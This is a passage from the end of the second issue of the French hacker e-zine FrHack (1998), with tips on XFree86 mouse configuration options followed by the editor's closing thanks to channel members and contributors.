Une souris sur le bus (par opposition … une souris s‚rie) utilise une IRQ particuliŠre, tant dans le noyau que dans Xfree86. Assurez-vous que la valeur utilis‚e est la mˆme partout!

De mˆme que pour le clavier, une clause existe pour les utilisateurs de Xqueue. La majorit‚ des installations de Xfree86 n'utilisant pas Xqueue, laissez cette ligne en commentaire. Le d‚bit et l'‚chantillonnage (clauses Bitrate et SampleRate), comme le commentaire l'indique concernent des anciennes souris Logitech. La plupart des souris n'en ont pas de besoin, laissez donc ces lignes comment‚es. Si votre souris ne fonctionne pas sans ces clauses, essayez d'abord un d‚bit de 9600 bauds puis, si cela ne va toujours pas, de 1200. Certaines anciennes versions de Xfree86 utilisaient toujours la clause BaudRate, mais commencez d'abord par la laisser en commentaire.

L'option Emulate3Buttons est utile si votre souris n'a que deux boutons. Dans ce cas, elle permet de simuler la pr‚sence d'un troisiŠme bouton par l'enfoncement simultan‚ des deux boutons. Beaucoup d'applications linux utilisent les trois boutons de la souris, cette option est donc utile pour les souris Microsoft et compatibles.

Finalement, l'option ChordMiddle s'applique … quelques souris Logitech. Si vous utilisez le pilote Logitech, commencez par tester votre souris sous Xfree86 sans cette option. Si elle ne se comporte pas correctement, retirez le commentaire de la ligne. La majorit‚ des souris Logitech n'a pas besoin de cette option, mais certains modŠles ne reconnaitront pas correctement le bouton du milieu sans elle.

The FrHack Crew
Oktober


-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Conclusion

Bon... je n'ai jamais eu de talent pour les conclusions, alors je vais ˆtre direct. Nous esp‚rons que vous avez apr‚ci‚ le deuxieme Emag de FrHack et nous comptons en sortir un autre le premier f‚vrier 1999. Je tiens … remercier tout les colaborateurs de ce Emag, aussi tout le monde qui vienne sur #hack.fr quotidiennement , les hackers, les codeurs, les phreakers, les anarchistes, et tout ce beau monde qui continue sans cesse de faire chier le gouvernement (Simple vengeance). Je tiens aussi … remercier specialement :
-Brain Override pour mavoir aider … repartir FrHack.
-PsYkAoS pour m'avoir aider … administrer ce channel.
-Oktober mon guru de linux pr‚f‚r‚.
-NuClEaR pour m'avoir aider … registr‚ ce channel.
-Le Pepsi pour m'avoir aid‚ … rester ‚veiller toutes ces nuits blanches que j'ai pass‚ … coder.
Et tous les autres que j'ai pas inclu et qui m'ont aid‚ pour FrHack.
Si vous avez des questions ou des recommandations : Snowcrash23@hotmail.com


Snowcrach et l'‚quipe de FrHack

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT